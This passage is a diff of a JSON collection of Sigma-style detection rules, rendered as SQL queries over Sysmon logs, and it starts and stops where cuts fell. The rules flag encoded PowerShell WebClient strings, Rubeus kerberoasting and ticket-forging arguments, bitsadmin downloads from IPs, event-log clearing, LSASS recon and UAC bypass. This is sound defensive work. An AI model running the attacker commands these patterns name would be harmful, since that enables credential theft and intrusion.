LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects a suspicious RDP session redirect using tscon.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR 
Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE 
'%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + 
"filename": "proc_creation_win_susp_recon.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog 
%' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Installation of unsigned packages for testing purposes" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% 
/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "status": "test", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Several false positives identified, check for suspicious file names or locations (e.g. 
Temp folders)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + }, + { + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. 
This could be used to establish persistence", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1140", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate 